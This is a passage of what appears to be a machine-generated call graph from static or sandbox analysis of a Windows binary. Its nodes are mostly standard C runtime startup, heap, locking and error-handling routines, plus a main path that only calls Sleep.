5808->5811 5809->5808 5812 1060b5 5810->5812 5813 10463b _free 14 API calls 5810->5813 5811->5810 5814 1060c7 5812->5814 5815 10463b _free 14 API calls 5812->5815 5813->5812 5816 10463b _free 14 API calls 5814->5816 5820 1060d9 5814->5820 5815->5814 5816->5820 5817 10463b _free 14 API calls 5818 1060eb 5817->5818 5819 1060fd 5818->5819 5821 10463b _free 14 API calls 5818->5821 5822 10463b _free 14 API calls 5819->5822 5819->5823 5820->5817 5820->5818 5821->5819 5822->5823 5823->5774 5825 106120 5824->5825 5826 106178 5824->5826 5827 106130 5825->5827 5828 10463b _free 14 API calls 5825->5828 5826->5776 5829 106142 5827->5829 5831 10463b _free 14 API calls 5827->5831 5828->5827 5830 106154 5829->5830 5832 10463b _free 14 API calls 5829->5832 5833 106166 5830->5833 5834 10463b _free 14 API calls 5830->5834 5831->5829 5832->5830 5833->5826 5835 10463b _free 14 API calls 5833->5835 5834->5833 5835->5826 5837 106628 5836->5837 5841 106647 5836->5841 5837->5841 5842 1061b4 5837->5842 5840 10463b _free 14 API calls 5840->5841 5841->5786 5843 106292 5842->5843 5844 1061c5 5842->5844 5843->5840 5878 10617c 5844->5878 5847 10617c __fassign 14 API calls 5848 1061d8 5847->5848 5849 10617c __fassign 14 API calls 5848->5849 5850 1061e3 5849->5850 5851 10617c __fassign 14 API calls 5850->5851 5852 1061ee 5851->5852 5853 10617c __fassign 14 API calls 5852->5853 5854 1061fc 5853->5854 5855 10463b _free 14 API calls 5854->5855 5856 106207 5855->5856 5857 10463b _free 14 API calls 5856->5857 5858 106212 5857->5858 5859 10463b _free 14 API calls 5858->5859 5860 10621d 5859->5860 5861 10617c __fassign 14 API calls 5860->5861 5862 10622b 5861->5862 5863 10617c __fassign 14 API calls 5862->5863 5864 106239 5863->5864 5865 10617c __fassign 14 API calls 5864->5865 5866 10624a 5865->5866 5867 10617c __fassign 14 API calls 5866->5867 5868 106258 5867->5868 5869 10617c __fassign 14 API calls 5868->5869 5870 106266 5869->5870 5871 10463b _free 14 API calls 5870->5871 5872 106271 5871->5872 5873 10463b _free 14 API calls 5872->5873 5874 10627c 5873->5874 5875 10463b _free 14 API calls 5874->5875 5876 106287 5875->5876 5877 10463b _free 14 API calls 5876->5877 5877->5843 5879 1061af 5878->5879 5880 10619f 5878->5880 5879->5847 5880->5879 5881 10463b _free 14 API calls 5880->5881 5881->5880 5882->5767 5884 104267 __dosmaperr 14 API calls 5883->5884 5885 1044b5 5884->5885 5886 1044c3 5885->5886 5891 10451e IsProcessorFeaturePresent 5885->5891 5886->5662 5888 10450d 5889 1044aa __fassign 18 API calls 5888->5889 5890 10451a 5889->5890 5890->5662 5892 10452a 5891->5892 5895 104362 5892->5895 5894 10453f GetCurrentProcess TerminateProcess 5894->5888 5896 10437e __fassign 5895->5896 5897 10446a UnhandledExceptionFilter 5896->5897 5898 10447b __fassign _ValidateLocalCookies 5897->5898 5898->5894 6732 107411 6733 107340 ___scrt_uninitialize_crt 59 API calls 6732->6733 6734 107419 6733->6734 6742 109053 6734->6742 6736 10741e 6752 1090fe 6736->6752 6739 107448 6740 10463b _free 14 API calls 6739->6740 6741 107453 6740->6741 6743 10905f ___scrt_is_nonwritable_in_current_image 6742->6743 6756 105ae8 EnterCriticalSection 6743->6756 6745 1090d6 6770 1090f5 6745->6770 6747 10906a 6747->6745 6749 1090aa DeleteCriticalSection 6747->6749 6757 1095d4 6747->6757 6751 10463b _free 14 API calls 6749->6751 6751->6747 6753 109115 6752->6753 6754 10742d DeleteCriticalSection 6752->6754 6753->6754 6755 10463b _free 14 API calls 6753->6755 6754->6736 6754->6739 6755->6754 6756->6747 6758 1095e0 ___scrt_is_nonwritable_in_current_image 6757->6758 6759 1095ea 6758->6759 6760 1095ff 6758->6760 6761 1045cb __dosmaperr 14 API calls 6759->6761 6766 1095fa 6760->6766 6773 10745d EnterCriticalSection 6760->6773 6762 1095ef 6761->6762 6764 10450e __fassign 18 API calls 6762->6764 6764->6766 6765 10961c 6774 10955d 6765->6774 6766->6747 6768 109627 6790 10964e 6768->6790 6849 105b30 LeaveCriticalSection 6770->6849 6772 1090e2 6772->6736 6773->6765 6775 10956a 6774->6775 6776 10957f 6774->6776 6777 1045cb __dosmaperr 14 API calls 6775->6777 6779 107293 ___scrt_uninitialize_crt 59 API calls 6776->6779 6783 10957a 6776->6783 6778 10956f 6777->6778 6780 10450e __fassign 18 API calls 6778->6780 6781 109594 6779->6781 6780->6783 6782 1090fe 14 API calls 6781->6782 6784 10959c 6782->6784 6783->6768 6785 107a81 ___scrt_uninitialize_crt 18 API calls 6784->6785 6786 1095a2 6785->6786 6793 109bc7 6786->6793 6789 10463b _free 14 API calls 6789->6783 6848 107471 LeaveCriticalSection 6790->6848 6792 109656 6792->6766 6794 109bd8 6793->6794 6799 109bed 6793->6799 6795 1045b8 __dosmaperr 14 API calls 6794->6795 6798 109bdd 6795->6798 6796 109c36 6797 1045b8 __dosmaperr 14 API calls 6796->6797 6800 109c3b 6797->6800 6801 1045cb __dosmaperr 14 API calls 6798->6801 6799->6796 6802 109c14 6799->6802 6804 1045cb __dosmaperr 14 API calls 6800->6804 6805 1095a8 6801->6805 6808 109b3b 6802->6808 6806 109c43 6804->6806 6805->6783 6805->6789 6807 10450e __fassign 18 API calls 6806->6807 6807->6805 6809 109b47 ___scrt_is_nonwritable_in_current_image 6808->6809 6819 105cc6 EnterCriticalSection 6809->6819 6811 109b55 6812 109b87 6811->6812 6813 109b7c 6811->6813 6815 1045cb __dosmaperr 14 API calls 6812->6815 6820 109c54 6813->6820 6816 109b82 6815->6816 6835 109bbb 6816->6835 6819->6811 6821 105d9d ___scrt_uninitialize_crt 18 API calls 6820->6821 6823 109c64 6821->6823 6822 109c6a 6838 105d0c 6822->6838 6823->6822 6825 105d9d ___scrt_uninitialize_crt 18 API calls 6823->6825 6834 109c9c 6823->6834 6828 109c93 6825->6828 6826 105d9d ___scrt_uninitialize_crt 18 API calls 6829 109ca8 CloseHandle 6826->6829 6831 105d9d ___scrt_uninitialize_crt 18 API calls 6828->6831 6829->6822 6832 109cb4 GetLastError 6829->6832 6830 109ce4 6830->6816 6831->6834 6832->6822 6833 104595 __dosmaperr 14 API calls 6833->6830 6834->6822 6834->6826 6847 105ce9 LeaveCriticalSection 6835->6847 6837 109ba4 6837->6805 6839 105d82 6838->6839 6840 105d1b 6838->6840 6841 1045cb __dosmaperr 14 API calls 6839->6841 6840->6839 6846 105d45 6840->6846 6842 105d87 6841->6842 6843 1045b8 __dosmaperr 14 API calls 6842->6843 6844 105d72 6843->6844 6844->6830 6844->6833 6845 105d6c SetStdHandle 6845->6844 6846->6844 6846->6845 6847->6837 6848->6792 6849->6772 6850 109911 6851 109935 6850->6851 6852 109986 6851->6852 6854 109a11 __startOneArgErrorHandling 6851->6854 6855 109998 6852->6855 6858 10a623 6852->6858 6857 10a859 __startOneArgErrorHandling 6854->6857 6866 10abb1 6854->6866 6859 10a636 DecodePointer 6858->6859 6860 10a646 6858->6860 6859->6860 6861 10a6d1 6860->6861 6862 10a68a 6860->6862 6863 10a675 6860->6863 6861->6855 6862->6861 6864 1045cb __dosmaperr 14 API calls 6862->6864 6863->6861 6865 1045cb __dosmaperr 14 API calls 6863->6865 6864->6861 6865->6861 6867 10abea __startOneArgErrorHandling 6866->6867 6869 10ac11 __startOneArgErrorHandling 6867->6869 6875 10ae8d 6867->6875 6870 10ac54 6869->6870 6872 10ac2f 6869->6872 6887 10b183 6870->6887 6879 10b1b2 6872->6879 6873 10ac4f __startOneArgErrorHandling _ValidateLocalCookies 6873->6857 6876 10aeb8 __raise_exc 6875->6876 6877 10b0b1 RaiseException 6876->6877 6878 10b0ca 6877->6878 6878->6869 6880 10b1c1 6879->6880 6881 10b235 __startOneArgErrorHandling 6880->6881 6882 10b1e0 __startOneArgErrorHandling 6880->6882 6883 10b183 __startOneArgErrorHandling 14 API calls 6881->6883 6885 10b183 __startOneArgErrorHandling 14 API calls 6882->6885 6886 10b22e 6882->6886 6884 10b24a 6883->6884 6884->6873 6885->6886 6886->6873 6888 10b190 6887->6888 6889 10b1a5 6887->6889 6890 10b1aa 6888->6890 6892 1045cb __dosmaperr 14 API calls 6888->6892 6891 1045cb __dosmaperr 14 API calls 6889->6891 6890->6873 6891->6890 6893 10b19d 6892->6893 6893->6873 7329 101291 IsProcessorFeaturePresent 7330 1012a6 7329->7330 7333 101269 7330->7333 7332 101389 7334 101274 UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7333->7334 7334->7332 6894 10a515 6896 10a53d 6894->6896 6895 10a575 6896->6895 6897 10a567 6896->6897 6898 10a56e 6896->6898 6903 10a5e7 6897->6903 6907 10a5d0 6898->6907 6904 10a5f0 6903->6904 6911 10aa5f 6904->6911 6906 10a56c 6908 10a5f0 6907->6908 6909 10aa5f __startOneArgErrorHandling 15 API calls 6908->6909 6910 10a573 6909->6910 6912 10aa9e __startOneArgErrorHandling 6911->6912 6915 10ab20 __startOneArgErrorHandling 6912->6915 6917 10ae6a 6912->6917 6914 10b183 __startOneArgErrorHandling 14 API calls 6916 10ab55 _ValidateLocalCookies 6914->6916 6915->6914 6915->6916 6916->6906 6918 10ae8d __raise_exc RaiseException 6917->6918 6919 10ae88 6918->6919 6919->6915 6920 104e15 6921 104e23 6920->6921 6922 104e27 6920->6922 6923 104e52 6922->6923 6924 104e2c 6922->6924 6923->6921 6931 106bf7 6923->6931 6925 1045de __dosmaperr 14 API calls 6924->6925 6927 104e35 6925->6927 6929 10463b _free 14 API calls 6927->6929 6928 104e72 6930 10463b _free 14 API calls 6928->6930 6929->6921 6930->6921 6932 106c04 6931->6932 6933 106c1f 6931->6933 6932->6933 6934 106c10 6932->6934 6935 106c2e 6933->6935 6940 108451 6933->6940 6936 1045cb __dosmaperr 14 API calls 6934->6936 6947 108484 6935->6947 6939 106c15 __fassign 6936->6939 6939->6928 6941 108471 HeapSize 6940->6941 6942 10845c 6940->6942 6941->6935 6943 1045cb __dosmaperr 14 API calls 6942->6943 6944 108461 6943->6944 6945 10450e __fassign 18 API calls 6944->6945 6946 10846c 6945->6946 6946->6935 6948 108491 6947->6948 6949 10849c 6947->6949 6951 1062bc 15 API calls 6948->6951 6950 1084a4 6949->6950 6957 1084ad __dosmaperr 6949->6957 6952 10463b _free 14 API calls 6950->6952 6955 108499 6951->6955 6952->6955 6953 1084b2 6956 1045cb __dosmaperr 14 API calls 6953->6956 6954 1084d7 HeapReAlloc 6954->6955 6954->6957 6955->6939 6956->6955 6957->6953 6957->6954 6958 106d27 __dosmaperr 2 API calls 6957->6958 6958->6957 7248 103a55 7249 101d3d ___scrt_uninitialize_crt 7 API calls 7248->7249 7250 103a5c 7249->7250 7335 101895 7336 1018cc 7335->7336 7337 1018a7 7335->7337 7337->7336 7344 101e5a 7337->7344 7342 103b94 59 API calls 7343 1018ea 7342->7343 7350 102183 7344->7350 7346 1018d9 7347 101e63 7346->7347 7348 102183 69 API calls 7347->7348 7349 1018e3 7348->7349 7349->7342 7363 102191 7350->7363 7352 102188 7352->7346 7353 106e7e __fassign 2 API calls 7352->7353 7354 103c4a 7353->7354 7355 106ec3 __fassign 59 API calls 7354->7355 7357 103c55 7354->7357 7355->7357 7356 103c5f IsProcessorFeaturePresent 7358 103c6b 7356->7358 7357->7356 7362 103c7e 7357->7362 7360 104362 __fassign UnhandledExceptionFilter 7358->7360 7359 1034b1 __fassign 23 API calls 7361 103c88 7359->7361 7360->7362 7362->7359 7364 10219a 7363->7364 7365 10219d GetLastError 7363->7365 7364->7352 7377 10245c 7365->7377 7368 102217 SetLastError 7368->7352 7369 102497 ___vcrt_FlsSetValue 6 API calls 7370 1021cb 7369->7370 7371 1021f3 7370->7371 7373 102497 ___vcrt_FlsSetValue 6 API calls 7370->7373 7376 1021d1 7370->7376 7372 102497 ___vcrt_FlsSetValue 6 API calls 7371->7372 7374 102207 7371->7374 7372->7374 7373->7371 7375 103bd0 ___vcrt_freefls@4 14 API calls 7374->7375 7375->7376 7376->7368 7378 10239d ___vcrt_InitializeCriticalSectionEx 5 API calls 7377->7378 7379 102476 7378->7379 7380 10248e TlsGetValue 7379->7380 7381 1021b2 7379->7381 7380->7381 7381->7368 7381->7369 7381->7376 6959 10a817 6960 10a830 __startOneArgErrorHandling 6959->6960 6961 10abb1 15 API calls 6960->6961 6962 10a859 __startOneArgErrorHandling 6960->6962 6961->6962 7544 103fd7 7545 103fe2 7544->7545 7546 103ff2 7544->7546 7550 103ff8 7545->7550 7549 10463b _free 14 API calls 7549->7546 7551 104013 7550->7551 7552 10400d 7550->7552 7554 10463b _free 14 API calls 7551->7554 7553 10463b _free 14 API calls 7552->7553 7553->7551 7555 10401f 7554->7555 7556 10463b _free 14 API calls 7555->7556 7557 10402a 7556->7557 7558 10463b _free 14 API calls 7557->7558 7559 104035 7558->7559 7560 10463b _free 14 API calls 7559->7560 7561 104040 7560->7561 7562 10463b _free 14 API calls 7561->7562 7563 10404b 7562->7563 7564 10463b _free 14 API calls 7563->7564 7565 104056 7564->7565 7566 10463b _free 14 API calls 7565->7566 7567 104061 7566->7567 7568 10463b _free 14 API calls 7567->7568 7569 10406c 7568->7569 7570 10463b _free 14 API calls 7569->7570 7571 10407a 7570->7571 7576 103e24 7571->7576 7577 103e30 ___scrt_is_nonwritable_in_current_image 7576->7577 7592 105ae8 EnterCriticalSection 7577->7592 7579 103e64 7593 103e83 7579->7593 7582 103e3a 7582->7579 7583 10463b _free 14 API calls 7582->7583 7583->7579 7584 103e8f 7585 103e9b ___scrt_is_nonwritable_in_current_image 7584->7585 7597 105ae8 EnterCriticalSection 7585->7597 7587 103ea5 7588 1040c5 __dosmaperr 14 API calls 7587->7588 7589 103eb8 7588->7589 7598 103ed8 7589->7598 7592->7582 7596 105b30 LeaveCriticalSection 7593->7596 7595 103e71 7595->7584 7596->7595 7597->7587 7601 105b30 LeaveCriticalSection 7598->7601 7600 103ec6 7600->7549 7601->7600 6963 101218 6964 101846 __fassign GetModuleHandleW 6963->6964 6965 101220 6964->6965 6966 101224 6965->6966 6967 101256 6965->6967 6971 10122f 6966->6971 6972 103493 6966->6972 6968 1034b1 __fassign 23 API calls 6967->6968 6969 10125e 6968->6969 6973 10338b __fassign 23 API calls 6972->6973 6974 10349e 6973->6974 6974->6971 6975 103119 6976 103131 6975->6976 6977 10312b 6975->6977 6978 1030c1 14 API calls 6977->6978 6978->6976 7382 102c9a 7383 102cb1 7382->7383 7384 102caa 7382->7384 7385 102cd2 7383->7385 7386 102cbc 7383->7386 7387 105562 67 API calls 7385->7387 7388 1045cb __dosmaperr 14 API calls 7386->7388 7389 102cd8 7387->7389 7390 102cc1 7388->7390 7406 104fa9 GetModuleFileNameW 7389->7406 7392 10450e __fassign 18 API calls 7390->7392 7392->7384 7393 102ceb 7414 102dd0 7393->7414 7396 102f44 14 API calls 7397 102d2d 7396->7397 7398 102d42 7397->7398 7399 102d36 7397->7399 7401 102dd0 59 API calls 7398->7401 7400 1045cb __dosmaperr 14 API calls 7399->7400 7402 102d3b 7400->7402 7403 102d5a 7401->7403 7404 10463b _free 14 API calls 7402->7404 7403->7402 7405 10463b _free 14 API calls 7403->7405 7404->7384 7405->7402 7407 104fd8 GetLastError 7406->7407 7408 104fe9 7406->7408 7409 104595 __dosmaperr 14 API calls 7407->7409 7410 104d22 59 API calls 7408->7410 7413 104fe4 _ValidateLocalCookies 7409->7413 7411 10501a 7410->7411 7420 104ea7 7411->7420 7413->7393 7416 102df5 7414->7416 7415 105888 59 API calls 7415->7416 7416->7415 7418 102e55 7416->7418 7417 102d20 7417->7396 7418->7417 7419 105888 59 API calls 7418->7419 7419->7418 7421 104ec3 7420->7421 7422 104eb4 7420->7422 7423 104ef0 7421->7423 7424 104ecb 7421->7424 7422->7413 7425 105935 ___scrt_uninitialize_crt WideCharToMultiByte 7423->7425 7424->7422 7441 104f6e 7424->7441 7427 104f00 7425->7427 7428 104f07 GetLastError 7427->7428 7429 104f1d 7427->7429 7431 104595 __dosmaperr 14 API calls 7428->7431 7430 104f2e 7429->7430 7432 104f6e 14 API calls 7429->7432 7430->7422 7433 105935 ___scrt_uninitialize_crt WideCharToMultiByte 7430->7433 7434 104f13 7431->7434 7432->7430 7435 104f46 7433->7435 7436 1045cb __dosmaperr 14 API calls 7434->7436 7435->7422 7437 104f4d GetLastError 7435->7437 7436->7422 7438 104595 __dosmaperr 14 API calls 7437->7438 7439 104f59 7438->7439 7440 1045cb __dosmaperr 14 API calls 7439->7440 7440->7422 7442 104f79 7441->7442 7443 1045cb __dosmaperr 14 API calls 7442->7443 7444 104f82 7443->7444 7444->7422 7602 1035db 7605 103540 7602->7605 7606 10354c ___scrt_is_nonwritable_in_current_image 7605->7606 7613 105ae8 EnterCriticalSection 7606->7613 7608 103556 7609 103584 7608->7609 7611 106777 __fassign 14 API calls 7608->7611 7614 1035a2 7609->7614 7611->7608 7613->7608 7617 105b30 LeaveCriticalSection 7614->7617 7616 103590 7617->7616 6979 10431c 6987 1069be 6979->6987 6982 104267 __dosmaperr 14 API calls 6983 104338 6982->6983 6984 104345 6983->6984 6992 104348 6983->6992 6986 104330 6988 1068dc __dosmaperr 5 API calls 6987->6988 6989 1069da 6988->6989 6990 1069f2 TlsAlloc 6989->6990 6991 104326 6989->6991 6990->6991 6991->6982 6991->6986 6993 104352 6992->6993 6994 104358 6992->6994 6996 1069fd 6993->6996 6994->6986 6997 1068dc __dosmaperr 5 API calls 6996->6997 6998 106a19 6997->6998 6999 106a22 6998->6999 7000 106a34 TlsFree 6998->7000 6999->6994 7001 10101e 7002 101026 7001->7002 7018 103503 7002->7018 7004 101031 7025 10143a 7004->7025 7006 1010a3 7007 1016f5 2 API calls 7006->7007 7017 1010c0 7006->7017 7008 1010c8 7007->7008 7009 101046 __RTC_Initialize 7009->7006 7031 1015c7 7009->7031 7011 10105f 7011->7006 7034 101681 InitializeSListHead 7011->7034 7013 101075 7035 101690 7013->7035 7015 101098 7041 103602 7015->7041 7019 103512 7018->7019 7020 103535 7018->7020 7019->7020 7021 1045cb __dosmaperr 14 API calls 7019->7021 7020->7004 7022 103525 7021->7022 7023 10450e __fassign 18 API calls 7022->7023 7024 103530 7023->7024 7024->7004 7026 101446 7025->7026 7027 10144a 7025->7027 7026->7009 7028 1016f5 2 API calls 7027->7028 7030 101457 ___scrt_release_startup_lock 7027->7030 7029 1014c0 7028->7029 7030->7009 7048 10159a 7031->7048 7034->7013 7083 103b35 7035->7083 7037 1016a1 7038 1016a8 7037->7038 7039 1016f5 2 API calls 7037->7039 7038->7015 7040 1016b0 7039->7040 7040->7015 7042 104110 __fassign 59 API calls 7041->7042 7043 10360d 7042->7043 7044 103645 7043->7044 7045 1045cb __dosmaperr 14 API calls 7043->7045 7044->7006 7046 10363a 7045->7046 7047 10450e __fassign 18 API calls 7046->7047 7047->7044 7049 1015b0 7048->7049 7050 1015a9 7048->7050 7057 1039c5 7049->7057 7054 103959 7050->7054 7053 1015ae 7053->7011 7055 1039c5 21 API calls 7054->7055 7056 10396b 7055->7056 7056->7053 7060 1036fb 7057->7060 7061 103707 ___scrt_is_nonwritable_in_current_image 7060->7061 7068 105ae8 EnterCriticalSection 7061->7068 7063 103715 7069 103756 7063->7069 7065 103722 7079 10374a 7065->7079 7068->7063 7070 103772 7069->7070 7072 1037e9 __dosmaperr 7069->7072 7071 1037c9 7070->7071 7070->7072 7073 106bf7 21 API calls 7070->7073 7071->7072 7074 106bf7 21 API calls 7071->7074 7072->7065 7076 1037bf 7073->7076 7075 1037df 7074->7075 7077 10463b _free 14 API calls 7075->7077 7078 10463b _free 14 API calls 7076->7078 7077->7072 7078->7071 7082 105b30 LeaveCriticalSection 7079->7082 7081 103733 7081->7053 7082->7081 7085 103b53 7083->7085 7088 103b73 7083->7088 7084 1045cb __dosmaperr 14 API calls 7086 103b69 7084->7086 7085->7084 7087 10450e __fassign 18 API calls 7086->7087 7087->7088 7088->7037 7251 103a5e 7254 103ac5 7251->7254 7255 103ad9 7254->7255 7256 103a71 7254->7256 7255->7256 7257 10463b _free 14 API calls 7255->7257 7257->7256 7089 103a1f 7092 10314f 7089->7092 7093 10315e 7092->7093 7094 1030c1 14 API calls 7093->7094 7095 103178 7094->7095 7096 1030c1 14 API calls 7095->7096 7097 103183 7096->7097 7258 10125f 7261 101629 7258->7261 7260 101264 7260->7260 7262 10163f 7261->7262 7264 101648 7262->7264 7265 1015dc GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7262->7265 7264->7260 7265->7264 7266 109d40 7269 109d5e 7266->7269 7268 109d56 7270 109d63 7269->7270 7271 10a623 15 API calls 7270->7271 7272 109df8 7270->7272 7273 109f8f 7271->7273 7272->7268 7273->7268 7618 101bc0 7622 101bde ___except_validate_context_record _ValidateLocalCookies __IsNonwritableInCurrentImage 7618->7622 7619 101c5e _ValidateLocalCookies 7621 101ce7 _ValidateLocalCookies 7622->7619 7623 102100 RtlUnwind 7622->7623 7623->7621 7624 103bc0 7625 103bc3 7624->7625 7626 103c45 __fassign 59 API calls 7625->7626 7627 103bcf 7626->7627 7098 109801 7099 109821 7098->7099 7102 109858 7099->7102 7101 10984b 7103 10985f 7102->7103 7104 1098c0 7103->7104 7105 10987f 7103->7105 7106 10a5e7 15 API calls 7104->7106 7107 10a4de 7104->7107 7105->7107 7109 10a5e7 15 API calls 7105->7109 7108 10990e 7106->7108 7107->7101 7108->7101 7110 10a50e 7109->7110 7110->7101 7628 106bc1 7629 106bf2 7628->7629 7630 106bcc 7628->7630 7630->7629 7631 106bdc FreeLibrary 7630->7631 7631->7630 7111 101204 7114 102aa0 7111->7114 7115 104267 __dosmaperr 14 API calls 7114->7115 7116 101215 7115->7116 7445 105f87 7446 105f93 ___scrt_is_nonwritable_in_current_image 7445->7446 7457 105ae8 EnterCriticalSection 7446->7457 7448 105f9a 7458 105c28 7448->7458 7451 105fb8 7482 105fde 7451->7482 7457->7448 7459 105c34 ___scrt_is_nonwritable_in_current_image 7458->7459 7460 105c3d 7459->7460 7461 105c5e 7459->7461 7463 1045cb __dosmaperr 14 API calls 7460->7463 7485 105ae8 EnterCriticalSection 7461->7485 7464 105c42 7463->7464 7465 10450e __fassign 18 API calls 7464->7465 7469 105c4c 7465->7469 7466 105c96 7493 105cbd 7466->7493 7469->7451 7471 105e1d 7469->7471 7470 105c6a 7470->7466 7486 105b78 7470->7486 7473 105e2f 7471->7473 7472 105ece 7477 105ed3 7472->7477 7473->7472 7474 105c28 19 API calls 7473->7474 7475 105e62 7474->7475 7475->7472 7476 105e92 GetFileType 7475->7476 7476->7475 7478 105eda 7477->7478 7479 105f1d GetStdHandle 7478->7479 7480 105f83 7478->7480 7481 105f30 GetFileType 7478->7481 7479->7478 7480->7451 7481->7478 7497 105b30 LeaveCriticalSection 7482->7497 7484 105fc9 7485->7470 7487 1045de __dosmaperr 14 API calls 7486->7487 7489 105b8a 7487->7489 7488 105b97 7490 10463b _free 14 API calls 7488->7490 7489->7488 7491 106abd 6 API calls 7489->7491 7492 105bec 7490->7492 7491->7489 7492->7470 7496 105b30 LeaveCriticalSection 7493->7496 7495 105cc4 7495->7469 7496->7495 7497->7484 7274 107349 7275 107356 7274->7275 7276 1045de __dosmaperr 14 API calls 7275->7276 7277 107370 7276->7277 7278 10463b _free 14 API calls 7277->7278 7279 10737c 7278->7279 7280 1045de __dosmaperr 14 API calls 7279->7280 7283 1073a2 7279->7283 7282 107396 7280->7282 7284 10463b _free 14 API calls 7282->7284 7285 1073ae 7283->7285 7286 106abd 7283->7286 7284->7283 7287 1068dc __dosmaperr 5 API calls 7286->7287 7288 106ad9 7287->7288 7289 106af7 InitializeCriticalSectionAndSpinCount 7288->7289 7290 106ae2 7288->7290 7289->7290 7290->7283 7291 10984f 7293 109858 7291->7293 7292 1098c0 7294 10a5e7 15 API calls 7292->7294 7295 10a4de 7292->7295 7293->7292 7297 10987f 7293->7297 7296 10990e 7294->7296 7297->7295 7298 10a5e7 15 API calls 7297->7298 7299 10a50e 7298->7299 7498 107ab0 7499 107aea 7498->7499 7500 1045cb __dosmaperr 14 API calls 7499->7500 7503 107afe _ValidateLocalCookies 7499->7503 7501 107af3 7500->7501 7502 10450e __fassign 18 API calls 7501->7502 7502->7503 7504 101db4 7507 101e02 7504->7507 7508 101dbf 7507->7508 7509 101e0b 7507->7509 7509->7508 7510 102183 69 API calls 7509->7510 7511 101e46 7510->7511 7512 102183 69 API calls 7511->7512 7513 101e51 7512->7513 7514 103b94 59 API calls 7513->7514 7515 101e59 7514->7515 7300 103a75 7301 10463b _free 14 API calls 7300->7301 7302 103a83 7301->7302 7303 10463b _free 14 API calls 7302->7303 7304 103a96 7303->7304 7305 10463b _free 14 API calls 7304->7305 7306 103aa7 7305->7306 7307 10463b _free 14 API calls 7306->7307 7308 103ab8 7307->7308 7309 108377 7310 105562 67 API calls 7309->7310 7311 10837c 7310->7311 7516 1058a0 GetCommandLineA GetCommandLineW 7517 1080a0 7520 1080b7 7517->7520 7519 1080b2 7521 1080c5 7520->7521 7522 1080d9 7520->7522 7523 1045cb __dosmaperr 14 API calls 7521->7523 7524 1080e1 7522->7524 7525 1080f3 7522->7525 7526 1080ca 7523->7526 7527 1045cb __dosmaperr 14 API calls 7524->7527 7530 103c94 __fassign 59 API calls 7525->7530 7533 1080f1 7525->7533 7528 10450e __fassign 18 API calls 7526->7528 7529 1080e6 7527->7529 7531 1080d5 7528->7531 7532 10450e __fassign 18 API calls 7529->7532 7530->7533 7531->7519 7532->7533 7533->7519 5899 1010e3 5900 1010ef ___scrt_is_nonwritable_in_current_image 5899->5900 5925 101401 5900->5925 5902 1010f6 5903 101249 5902->5903 5912 101120 ___scrt_is_nonwritable_in_current_image __fassign ___scrt_release_startup_lock 5902->5912 5960 1016f5 IsProcessorFeaturePresent 5903->5960 5905 101250 5939 1034ed 5905->5939 5910 10113f 5911 1011c0 5933 10318b 5911->5933 5912->5910 5912->5911 5942 1034c7 5912->5942 5917 1011db 5949 101846 GetModuleHandleW 5917->5949 5920 1011e6 5921 1011ef 5920->5921 5951 1034a2 5920->5951 5954 101572 5921->5954 5926 10140a 5925->5926 5967 101995 IsProcessorFeaturePresent 5926->5967 5930 10141b 5931 10141f 5930->5931 5977 101d3d 5930->5977 5931->5902 6039 105562 5933->6039 5935 1011ce 5938 101000 Sleep 5935->5938 5937 103194 5937->5935 6045 105888 5937->6045 5938->5917 6599 10338b 5939->6599 5943 103b94 ___scrt_is_nonwritable_in_current_image 5942->5943 5944 1034dd __dosmaperr 5942->5944 5945 104110 __fassign 59 API calls 5943->5945 5944->5911 5948 103ba5 5945->5948 5946 103c45 __fassign 59 API calls 5947 103bcf 5946->5947 5948->5946 5950 1011e2 5949->5950 5950->5905 5950->5920 5952 10338b __fassign 23 API calls 5951->5952 5953 1034ad 5952->5953 5953->5921 5955 10157e 5954->5955 5956 1011f7 5955->5956 6669 103b05 5955->6669 5956->5910 5958 10158c 5959 101d3d ___scrt_uninitialize_crt 7 API calls 5958->5959 5959->5956 5961 10170b __fassign 5960->5961 5962 1017f3 UnhandledExceptionFilter 5961->5962 5963 101801 __fassign 5962->5963 5963->5905 5964 1034b1 5965 10338b __fassign 23 API calls 5964->5965 5966 10125e 5965->5966 5968 101416 5967->5968 5969 101d1e 5968->5969 5983 102271 5969->5983 5972 101d27 5972->5930 5974 101d2f 5975 101d3a 5974->5975 5997 1022ad 5974->5997 5975->5930 5978 101d50 5977->5978 5979 101d46 5977->5979 5978->5931 5980 102256 ___vcrt_uninitialize_ptd 6 API calls 5979->5980 5981 101d4b 5980->5981 5982 1022ad ___vcrt_uninitialize_locks DeleteCriticalSection 5981->5982 5982->5978 5984 10227a 5983->5984 5986 1022a3 5984->5986 5987 101d23 5984->5987 6001 1024d5 5984->6001 5988 1022ad ___vcrt_uninitialize_locks DeleteCriticalSection 5986->5988 5987->5972 5989 102223 5987->5989 5988->5987 6020 1023e6 5989->6020 5994 102253 5994->5974 5996 102238 5996->5974 5998 1022d7 5997->5998 5999 1022b8 5997->5999 5998->5972 6000 1022c2 DeleteCriticalSection 5999->6000 6000->5998 6000->6000 6006 10239d 6001->6006 6004 10250d InitializeCriticalSectionAndSpinCount 6005 1024f8 6004->6005 6005->5984 6007 1023d8 6006->6007 6008 1023b5 6006->6008 6007->6004 6007->6005 6008->6007 6012 102303 6008->6012 6011 1023ca GetProcAddress 6011->6007 6017 10230f ___vcrt_InitializeCriticalSectionEx 6012->6017 6013 102383 6013->6007 6013->6011 6014 102325 LoadLibraryExW 6015 102343 GetLastError 6014->6015 6016 10238a 6014->6016 6015->6017 6016->6013 6018 102392 FreeLibrary 6016->6018 6017->6013 6017->6014 6019 102365 LoadLibraryExW 6017->6019 6018->6013 6019->6016 6019->6017 6021 10239d ___vcrt_InitializeCriticalSectionEx 5 API calls 6020->6021 6022 102400 6021->6022 6023 102419 TlsAlloc 6022->6023 6024 10222d 6022->6024 6024->5996 6025 102497 6024->6025 6026 10239d ___vcrt_InitializeCriticalSectionEx 5 API calls 6025->6026 6027 1024b1 6026->6027 6028 1024cc TlsSetValue 6027->6028 6029 102246 6027->6029 6028->6029 6029->5994 6030 102256 6029->6030 6031 102260 6030->6031 6033 102266 6030->6033 6034 102421 6031->6034 6033->5996 6035 10239d ___vcrt_InitializeCriticalSectionEx 5 API calls 6034->6035 6036 10243b 6035->6036 6037 102453 TlsFree 6036->6037 6038 102447 6036->6038 6037->6038 6038->6033 6040 10556b 6039->6040 6044 10559d 6039->6044 6048 1041cd 6040->6048 6044->5937 6596 105831 6045->6596 6049 1041de 6048->6049 6050 1041d8 6048->6050 6052 106a7b __dosmaperr 6 API calls 6049->6052 6072 1041e4 